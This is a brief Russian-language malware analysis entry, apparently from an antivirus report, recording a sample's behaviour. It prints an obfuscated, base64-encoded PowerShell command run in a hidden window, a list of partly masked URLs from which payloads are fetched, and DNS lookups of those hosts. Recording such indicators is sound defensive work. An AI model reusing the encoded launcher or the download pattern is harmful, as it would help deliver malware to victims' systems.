Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF...
- http://te###sign.com/stats/0W/
- http://www.vi##-all.ch/open-array/HP/
- http://xa####digital.com/condosdominicano.biz/50sWkJ/
- http://cr####vityonline.fr/aideadomicile-goderville/jcUzC/
- DNS ASK te###sign.com
- DNS ASK vi##-all.ch
- DNS ASK xa####digital.com
- DNS ASK li######.fischertrust.org
- DNS ASK cr####vityonline.fr
- DNS ASK ba#####cityjewel.com
- DNS ASK de##ine.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF...' (со скрытым окном)